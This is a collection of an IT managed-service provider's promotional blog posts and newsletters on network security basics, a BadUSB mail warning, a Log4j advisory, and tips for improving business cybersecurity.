Author: leeshanok

How Network Security Works

Protecting company data, devices, network access control, and systems is critical for business operations. On average, businesses suffer more than 16 days of downtime (link to: https://www.coveware.com/blog/2020/1/22/ransomware-costs-double-in-q4-as-ryuk-sodinokibi-proliferate) after a ransomware attack. Even worse, costs of downtime and loss of network traffic range from thousands of dollars to hundreds of thousands of dollars per day.

Network security uses a combination of technology and policies to prevent attacks and reduce downtime. The goal of network security is to maintain network functionality for authorized users while preventing intrusion, data destruction, and data theft.

Various types of network security work in layers by:

  • Creating a barrier between the trusted internal network and external networks like the internet
  • Authenticating users so only authorized people can access the network
  • Alerting administrators to intrusion attempts
  • Preventing viruses and malware from infecting the network

In addition to preventing downtime, these types of network security protect sensitive information, keep businesses in compliance with regulations, and much more. Our guide to Why Cybersecurity is Important (link to:https://www.leeshanok.com/why-cybersecurity-is-important/) covers all the reasons network security should be a priority.

What is Network Security?

Network security is a combination of technology, people, and policies. These work together to protect network connected devices, IT infrastructure, and data that flows through the network. It protects the network from both internal and external attacks.

Network Security vs. Cybersecurity

Network security is a subset of cybersecurity. Cybersecurity is the broader protection of a company’s entire digital system. It includes protecting the network, but also includes protecting against social engineering, educating employees on security best practices, and ensuring technology remains safe to support continued operations.

Network security is the more specific protection of network connected devices and the data flowing between them. Network security is typically more concerned with protecting IT infrastructure with purpose-built hardware and software solutions. It protects against technical cyberattacks like:

  • Viruses and worm
  • Denial of service (DoS) attacks
  • Trojan Horses
  • Zero-day exploits

Network security is a part of cybersecurity, so the two are closely related. This can make them hard to distinguish from each other. Let’s look at a common example. Two malicious emails are sent to your company. One is a phishing email attempting to trick employees into giving up confidential information. The other is an email with a malicious attachment that will install malware on the victim’s computer.

Phishing

Cybersecurity protects against the phishing email by training employees to recognize and avoid phishing attempts. Trained employees will not respond with sensitive information. 

Network security protects against the malicious email attachment. The network firewall could prevent the email from ever making it to an inbox. If the email makes it past the firewall, content filtering could remove the attachment. If an employee does get the email and attempts to install it, antivirus software could prevent installation or remove the harmful program before it has a chance to do much damage.

There are many components of network security that work together to keep the network, and company, safe.

Elements of Network Security Work

Network security requires technology, policies, and people to all work together. These network security defined elements need to be configured to all work together to make the network security measures functional for authorized users while keeping bad actors out. 

Firewalls

Firewalls are network security devices that monitor incoming and outgoing network traffic. They are configured to allow safe data packets to pass through while blocking unsafe data packets. 

Think of your network as a castle. Your firewall is like the guards at the gate. They check everyone coming in and going out. Your firewall guards open the drawbridge for safe, trusted people, and close it when dangerous ones try to get in.

Next Generation Firewalls

Next Generation Firewalls (link to Next Generation Firewalls) include the same functionality as traditional network security firewalls plus additional features like Intrusion Prevention Systems of unauthorized users, content filtering, and real time updates. 

In the castle example, next generation firewalls would be guards at the gate who would receive updates from other castles about dangerous people to look out for. They’d also be able to remove unwanted people more forcefully.

Intrusion Prevention Systems

Intrusion Prevention Systems (IPS) (Link to: Intrusion Prevention Systems) are either hardware or software solutions that detect intrusion attempts to your physical network security, automatically remove them from the network, and alert IT administrators to the attempt and response. These multiple layers make up a robust network security system.

The IPS is either part of a next generation firewall or a standalone solution. Either way, it’s a necessary component of network security because it is updated to protect against new security threats in real time, and it responds to intrusion attempts instantly. This removes the potentially dangerous delay that is inevitable when a network security threat requires human intervention.

With the volume and frequency that hackers create new attacks and discover vulnerabilities, it is critical your network is protected by a system that can adapt.

Content Filtering

Content filtering protects your company in two ways. First, it protects your network from malicious websites and email attachments. Second, it protects the company from the liability of employees accessing inappropriate content on the company network.

Content filtering with targeted access control can also be either a part of a next generation firewall or can be a standalone solution. Content filters are self-explanatory. They analyze keywords, phrases, and other data strings of all content accessed on the network. They filter out dangerous content and any content that violates company policies.

Web content filtering (link to Web Content Filtering) and email content filtering are the two most common forms of content filtering.

VPN or Virtual Private Network

Virtual Private Networks allow remote employees to safely connect to the company network. A virtual private network encrypts valuable data; this is especially important for employees who are working from home. 

Physical networking infrastructure is traditionally housed in the company’s building. Employees who work in that building can connect to the network without a VPN. However, offsite employees still need access to the same applications and data housed on the network. VPNs create a secure tunnel to the company network that employees can access using their own internet connections.

Site-to-site VPN

Site-to-site virtual private networks can also be used to connect branch offices. Say your company has three offices. Your headquarters in Building A houses the physical networking infrastructure. Offices B and C don’t have any physical network infrastructure but can connect to the company network in Building A using a VPN.

Cloud Security

Many businesses are moving from physical network infrastructure to cloud services, which are more accessible on mobile devices. Security is still important even if the network hardware is owned by a third party and hosted offsite, as unwanted parties are increasingly targeting mobile devices. 

A traditional network security system focused on building a perimeter around the network. With the cloud, there is no perimeter because it is accessible on any device. Keeping data secure is the new focus. This requires more secure authentication, encryption, endpoint security, and data segmentation.

The Cloud

Moving fully to the cloud also means the business is reliant on another company to keep the physical network devices safe and operational. The leading cloud providers promise the highest levels of uptime and security.  

The cloud isn’t necessarily insecure by default, but it requires a different way of thinking and different questions to ask the cloud providers.

Network Access Control Security Professionals

The people behind network security are often the most overlooked element. These professionals design, install and maintain network security infrastructure. Without them, network security becomes outdated, and infrastructure starts to fail.

It takes a high degree of technical knowledge and certification to keep a network properly secured. Businesses have a few options for how to obtain these essential personnel. They could staff and train an internal IT department. This is a good option for businesses with a lot of resources. A full team is usually necessary to cover all IT functions and avoid skill gaps. This keeps the talent in-house, but is the most expensive option.

Managed IT Provider

Businesses could also hire a managed IT provider like LeeShanok. Managed service providers (MSPs) supply the fully trained teams and partner with you to keep your network secure. This is generally the most affordable option, and a good choice if you prefer not to have internal IT staff. 

The third option is often the best: partnering internal IT staff with an MSP. A good MSP works as a team with internal IT staff. They compliment each other’s skills to fully protect your network. The MSP can cover the gaps in the current IT department at a lower cost than hiring additional personnel.

How Secure is My Network Traffic?

Starting to think about your own company’s network security? LeeShanok’s Network Security Assessments (link to: network security assessment) are a great check-up to see how healthy your network is. We’ll give you a network security report card with actionable steps to better protect your company.

Request my Network Security Assessment

Hackers Mailing Bad USB Drives

LeeShanok IT News

Hackers Mailing Bad USB Drives

According to a new FBI warning, cyber criminals are mailing USB drives capable of installing malware onto business networks. These known “BadUSB” attacks claim to either be a message from the Department of Health and Human services regarding COVID-19 or a gift from Amazon.

In these recent cases, USB drives injected keystrokes onto the victim’s computer. These keystrokes led to the installation of ransomware. This is one of many possible attacks BadUSB drives are capable of.

What should I do?

Never plug in an unfamiliar USB Drive. This includes devices received in the mail or found out in the street. Be extra cautious of USB drives with enticing labels like “Bitcoins” or “Gift Cards.” It’s best to dispose of these devices immediately.

If you come across a USB Drive you think may have important data on it, send the device to your IT provider. They will be able to view the contents in a secure sandbox environment.

USB Security, and Other Cybersecurity Tips, in This Week’s Webinar

USB Security is just one of the many important topics covered in the IT Security Awareness for the Common Worker 101B training.

The free training will take place this Thursday, January 13th from 11am – 11:45am. Topics include:

  • Next gen phishing prevention
  • USB Safety
  • Strengthening your Human Firewall
  • Updates & Patches
  • & Much More

Miss last month’s 101A training? No problem! 101B is a standalone webinar with crucial cybersecurity tips for every employee, regardless of IT expertise. Hope to see you there!

Register

LeeShanok Network Solutions

3877 N 7th Street | Suite 320 | Phoenix | Arizona | 85014
ITNews@leeshanok.com

Continue reading

LeeShanok IT News IT Resolutions for 2022!

The new year is just around the corner! As the calendar turns, it’s a great time to reflect on what you want from the year ahead. Here are our top five IT resolutions for 2022.

Top 5 IT New Year’s Resolutions

  1. Set your IT roadmap – What goals do you have for your technology next year? What will no longer be supported in 2022? What kind of support will you need? A clear destination makes the journey much easier.
  2. Schedule annual cybersecurity training for everyone at your company. Cybercrime is expected to increase again in 2022. Education is the best defense, make sure everyone is well trained. Our next cybersecurity training is Thursday Jan. 13th. Register Here.
  3. Get adequate cyber insurance – With the increasing risk, cyber insurance is growing more and more important. Make sure you have an appropriate policy. Riders on your general liability policy may no longer be enough.
  4. Invest in collaboration – The shift to hybrid and fully remote work is expected to continue in 2022. Make sure you’re getting the most from your collaboration tools so your teams don’t become isolated.
  5. Thoroughly assess your cloud strategy – Businesses are expected to continue migrating more functions to the cloud. This opens to the door to higher efficiency and lower costs but getting the migration right can be difficult. Each vendor, their reliability, security, and functionality all must be carefully considered.

As always, LeeShanok is happy to help! Let us know how we can help you stick to these resolutions, or any others you’re making for 2022.

LeeShanok Network Solutions is Turning 25!
On January 1st, LeeShanok will officially turn 25! We’re excited we can finally rent a car, but we’re even more excited to continue helping you manage your technology.

Our success is thanks to you, our clients. Since 1997, you have challenged us to grow and adapt. The technology landscape is entirely different today than it was back then but supporting happy clients has kept us motivated to keep learning and keep getting better.

From the entire LeeShanok team, our sincerest THANK YOU! We have a lot of exciting things planned to celebrate, stay tuned!

Your Technology Partner,

The LeeShanok Team

Phoenix:  602-277-5757         Tucson:   520-888-9122         ITNews@leeshanok.com

LeeShanok IT News – Major Vulnerability – Log4j Exploit

Last week, a significant cybersecurity vulnerability was identified dubbed Log4j or Log4Shell. The vulnerability allows hackers to remotely control a victim’s computer/server by running malicious code using an exploit in the Log4j library. The exploit is easy to execute and very widespread because the Log4j library is used in many software packages and online systems.

Because of the ease of attack, its widespread nature, and the potential damage, this is considered riskier than 99.61% of all cybersecurity vulnerabilities

What Hackers Are Doing Currently, hackers are primarily scanning for vulnerable devices and taking control of them to mine for cryptocurrency. However, it is possible for them to take much more malicious actions using this exploit.
What LeeShanok is Doing
We have seen scans and remote control attempts on several of our clients’ servers. Thankfully, next generation firewalls have successfully blocked these attempts at gaining control. If you are not sure if you have the correct type of firewall protecting you, ask your account manager.  

For all of our managed IT clients, we are automatically patching using the following process. This is included in your managed IT plan:
1. Checking to see if a breach has been attempted
2. If so, checking to see if any payloads have been executed
3. If so, assessing the risk level of the payload
1. If the risk is low, performing a malware scan
2. If the risk is high, taking the system offline and restoring from backup
4. Applying security patches and rebooting if needed
5. If there is a next generation firewall, confirm it is configured to block intrusion attempts
6. Perform a vulnerability scan to confirm the patch was successful

If you are not a managed IT client, and you would like our team to assist with assessing your systems, please reach out to us for support.

What You Should Do
Stay alert for any updates/patches pushed out by your other technology vendors and install them immediately. Keep an eye out for further communication from LeeShanok pertaining to your unique situation.
 
The LeeShanok Team
 
Phoenix:  602-277-5757         Tucson:   520-888-9122         ITNews@leeshanok.com

How to Improve Cybersecurity

IT cyber security is designed in layers. Digital threats to a company usually originate from outside. Threats that breach a layer tend to settle in and seek other devices at the same layer. When the attempt to breach the next layer is made, malicious programs will make attempts from multiple devices. By the time inner layers are breached, many devices have already been compromised, and exfiltration of company data has probably already occurred. See Why Cybersecurity is Important.

With network infrastructures that include both on-premises and cloud-based infrastructure, layering your network cybersecurity to protect it all can be challenging. Historically this would require unique solutions for each part of the infrastructure, but today there are solutions available that simplify and consolidate monitoring and management. There are many ways to protect against threats. Below are actionable ways to improve your firm’s cybersecurity.

End Users & Devices

Protect Wi-Fi Network Access from Cyberattacks

Many firms have both staff Wi-Fi and guest Wi-Fi networks. There’s usually a password required to connect to the staff Wi-Fi, but many times the guest network has no password. This opens the door for direct cyberattacks against connected devices. Use a password on all your firm’s Wi-Fi networks.

Another issue emerges with Wi-Fi authentication when an employee is terminated. The terminated employee could park close by and connect to the guest Wi-Fi (open) or staff Wi-Fi network (Wi-Fi password still the same), where they could launch attacks against other connected devices or seek company data to steal.

Most firms do not change the Wi-Fi password on termination of an employee because it requires all remaining employees to change the password in the devices they connect with. As time goes by, more and more terminated employees will have access to the company’s Wi-Fi networks. Adding a RADIUS Server to your Wi-Fi authentication fixes this by coordinating with the user’s Active Directory (AD) account. When an employee is terminated, simply marking their AD account “inactive” prevents them from connecting to the Wi-Fi network. No other employee’s access is affected.

Security Measures on Mobile Devices

Regardless of operating system, many employees use personal mobile devices to read company email, log in to cloud accounts, generate and send quotes, and other tasks that require access to company networks and data.

These employee devices may not meet sophisticated cybersecurity measures the company demands from connected devices, and are therefore vulnerable to external access and cyberattacks. If an employee loses their device, all the data and stored credentials may be available to cyber criminals.

To guard against these risks, it’s important for companies to use a Mobile Device Manager (MDM) and enroll all personal phones that are used for company business. Good MDMs push group security policies to enrolled devices, and also locate or wipe a lost phone. Employees should also set up “Find My Phone” while they have the device in their possession so that lost devices are easier to recover.

Utilize Group Policies for Cybersecurity

Group policies are central rules that can be applied to all devices that access company resources. Common cybersecurity policies can be designed for all user accounts and devices at time of login. Policies can also be designed by groups. For example, senior management devices have different cybersecurity rules than front-line workers.

Pushing out cybersecurity policy in this fashion eliminates the need to sit at each device and configure its security in case of a security breach, and it provides common security policies to all employees with certain job types or common access to specific data stores.

Improve Employees’ Password Management

Many employees have a favorite password they never forget, and they use it across multiple websites and their domain login. A data breach at just one of those sites, and all the employee’s accounts are compromised. A better strategy is to use a different password on each site, but that can be impossible to remember without writing them down, another risky practice.

The best strategy is to use a company-wide password manager that generates complex passwords and provides access to password folders via role-based policies. Some password managers provide segmentation of each user’s passwords with their own secure folder, allowing them to manage both their personal and professional passwords. With this strategy, your employee only needs to create and memorize one strong password for the password manager.

Enable Multi-Factor Authentication on All Your Accounts

Enabling two factor authentication for adds a layer of protection to each user account’s sensitive information on personal devices. When logging in, after the username and password are accepted, the site sends a text or notification to an authenticator app on your phone. If you verify the notification, then the connection is completed.

Strong authentication is particularly useful in squashing security risks like a stranger’s attempt to access one of your online accounts and trying to steal your personal data. You would receive notification about a login attempt but did not initiate it. That would be a good time to change the account password to a different strong password, as it’s clear someone has the current credentials or personal information.

Individuals can reduce their cyber risk by enabling MFA on many individual sites, but a faster way is to have your IT department or your managed IT service provider require it for all accounts.

Require Cybersecurity Training

The user is the most important security measure, and an educated user fortifies all other layers of security. Up to 95% of cybersecurity breaches are the result of human error, so it’s important to have all employees regularly trained on cybersecurity best practices.

Keep your business safe with one of the many webinars and in-person trainings are available, but it’s important to select a provider who is knowledgeable and has invested in the quality and delivery of the material.

LeeShanok’s IT Security for the Common Worker series is a free, monthly webinar that teaches cybersecurity best practices to employees of all levels of IT skill. LeeShanok also offers custom, in-person training to Arizona businesses.

Local Network Infrastructure

Assess Your Network Infrastructure and Security

Before making changes to your network, it’s important to assess what you currently have and create a network diagram if one does not exist already. Making changes without understanding the current network layout can result in additional complexity and reduced security.

If you’re not sure where to start, most managed IT service providers (MSPs) offer network assessments that generate documentation of the infrastructure, credentials, configurations, and recommendations to improve security.

Some MSPs like LeeShanok also offer network security assessments, which includes network assessment documentation, along with analyses of the security posture and risks that are present. A network security assessment may also include penetration testing to test actual vulnerabilities.

Segment Your Network

If you have two Wi-Fi networks (like a staff and guest network), segmenting the two into VLAN 1 & VLAN 2 provides a security barrier. Devices and sessions running in one VLAN are blocked from accessing devices in the second VLAN. Network segmentation can be physical or logical and involves breaking down a network into smaller subnets.

Segmenting your public Wi-Fi architecture and maintaining software updates helps simplify management of firewall policies, reduces the overall attack surface, and strengthens your firm’s security.

Proactively Manage Infrastructure

It is very important that the cybersecurity of your network not be a set-and-forget exercise. Even the best defenses see reduced protection over time as bad actors test for and identify vulnerabilities. Many smaller firms use home-grade devices, resulting in big security holes for sophisticated breach strategies.

It is challenging and expensive for internal staff to continuously manage these risks, which is why many use a “set and forget” strategy. Professional Managed IT Service Providers solve this by specializing in proactively securing, fixing, and updating technology more affordably than additional internal staff.

Consider hiring a Managed IT Provider if your internal resources aren’t able to regularly research and deploy new cybersecurity strategies to keep up with the evolving threat landscape.

Replace Legacy Devices

Improve your cybersecurity posture by replacing aging devices with new devices that have more sophisticated and coordinated security features. Work with your internal IT or your managed IT service provider to select new devices that align with your overall IT strategy.

Following deployment, it is also important for you or your managed service provider to actively manage infrastructure components, keep their firmware and software up to date, and investigate all notifications when threats are detected.

Update Firmware and Software in All Devices

Many attacks exploit vulnerabilities in networking, server and end-user devices. Manufacturers respond to discovered vulnerabilities by developing and releasing updates and patches to both firmware and embedded software. Most devices do not automatically install updates, so there is human involvement needed to search for and install updates to devices. This process should be repeated at least quarterly for all infrastructure devices. Learn how to Update Firmware in Network Devices.

Software suites also regularly release updates and patches to be installed. Some are installed automatically, while others need to be manually installed. All employees should be keeping software up to date.

Use SSL VPN for Site-to-Site Connections

Virtual Private Networks (VPNs) have been a secure method to remotely connect to company resources for years. Unfortunately, most VPN software apps have vulnerabilities that can allow a hacker to gain admin access to the interface, opening it up for rogue connections to a company domain.

Upgrade to SSL VPN connections, which require an SSL Certificate be purchased and imported into each connected firewall to establish trust. New VPN software is required on end user devices to allow connection via SSL VPN.

Other permanent VPN tunnels may be used to connect a local network to a cloud hosted environment like Microsoft Azure. SSL VPN should be used here as well to protect the connection and access to the hosted environment.

See LeeShanok’s IT News articles on:  SSL/TLS Migration for PCI Compliance, Work Remote Securely

Manage Firewall Ports

Firewall ports are used for computer-to-computer communication. Many firewall ports are open by default, like 443 for internet traffic. Some ports should be managed more actively, opening when network packets need to pass and then closing until the next packets need to pass.

Ports can be closed by disabling the service or using network firewall rules that Deny-All-Permit-By-Exception (DAPE). Also disabling Universal Plug and Play (UPnP) in the firewall prevents any computer in the network from opening ports without challenge.

Enabling both network firewall and host-based firewall capability is a best-practice. Enabling firewall rules will block external services, but should be tested to make sure desired services can still communicate.

On end-user computers, port management is done by antivirus apps. It’s usually fine to allow the default configuration, but some firms may have a group policy that pushes out different security policies to all end-user devices.

Set Up GeoLocation and GeoBlocking

Certain geographies are known to present greater cybersecurity risks. For example, more cyberattacks originate from China and Russia than any other countries. GeoLocation estimates where a connection originates, and GeoBlocking blocks connections from those regions.

If your company doesn’t do business in a risky geography, it should be GeoBlocked by default. Most newer firewalls have this option available.

Cloud Infrastructure and Services

Migrate from Backups to Business Continuity & Disaster Recovery

To recover from a breach, infection or ransomware, backups are the best method. Traditional backups usually involved an external USB drive physically plugged in to a server or end user computer. This backup method may not include cloud-based data, it doesn’t protect against an on-premises disaster, and recovery may take longer.

Modern backup capability includes business continuity and disaster recovery (BCDR), which backs up operating systems, Active Directory configurations, and storage. BCDR usually involves an on-premises backup which has the ability to complete a restoration in a few minutes or hours, rather than the days or weeks a server re-build requires. There’s also a redundant cloud-based backup in the event of an on-premises disaster.

Diagram of the structure of Datto’s Siris BCDR solution.

Backup your Cloud Environments

Modern backup strategies should also include important Software-as-a-Service (SaaS) accounts like Microsoft 365 or Google Workspace. Microsoft protects their data center and all data from natural disasters and failures. However, you are responsible for data loss due to human error, external hackers, malicious insiders, and more.

Approximately 90% of all companies use the cloud in some capacity and falsely assume data is backed up automatically. SaaS Protection for cloud accounts is a must-have for a modern backup strategy.

Monitor Dark Web for Compromised Company Credentials

Dark web monitoring generates reports of users in your domain whose usernames and passwords are found for sale on the Dark Web. A Dark web monitoring service can notify you when those credentials are compromised, so you can have the employee reset passwords and enable Multi-Factor Authentication.

LeeShanok offers a complimentary Dark Web Scan that shows the compromised usernames and passwords of everyone with an email address on your company’s domain.  

Migrate from EDR to XDR

Endpoint Detection and Response (EDR) is the traditional method of monitoring endpoints for advanced persistent threats and new malware that may evade defenses. Extended Detection and Response (XDR) spans across platforms, endpoints, on-premises environments, cloud environments, and endpoints.

XDR usually provides a “single pane of glass” view for monitoring and responding to threats. XDR also uses artificial intelligence (AI) to scan various logs from multiple platforms and provide accurate, context-rich alerts.

Plan for Secure Access Service Edge (SASE)

SASE is a new framework in which networking and security converge into a single integrated service that works at the cloud edge to deliver networking and security functions as a service. With widespread cloud adoption, the SASE model simplifies and consolidates many different networking and security functions.

The technology is still in its early stages, but expect to adopt this model soon if your organization hasn’t yet. As an example, Cisco’s SASE offering includes:

  • SD-WAN
  • Cloud security
  • Zero trust conditional access
  • Umbrella security
  • Secure access by DUO
  • ThousandEyes for network outage monitoring

Hire a Managed IT Security Provider

As you can see, improving cybersecurity can be a challenging task. It requires constant vigilance and a high degree of technical expertise. Threats like ransomware are increasing every year, and businesses of every size are lucrative targets.

Many companies choose to hire managed IT service providers for their IT security. It’s generally more cost-effective, and the knowledge pool is deeper than what can be achieved with most internal IT teams. LeeShanok has been providing IT security since 1997. Request a complimentary network assessment to find out where your network is vulnerable, and which steps are most important for you to take.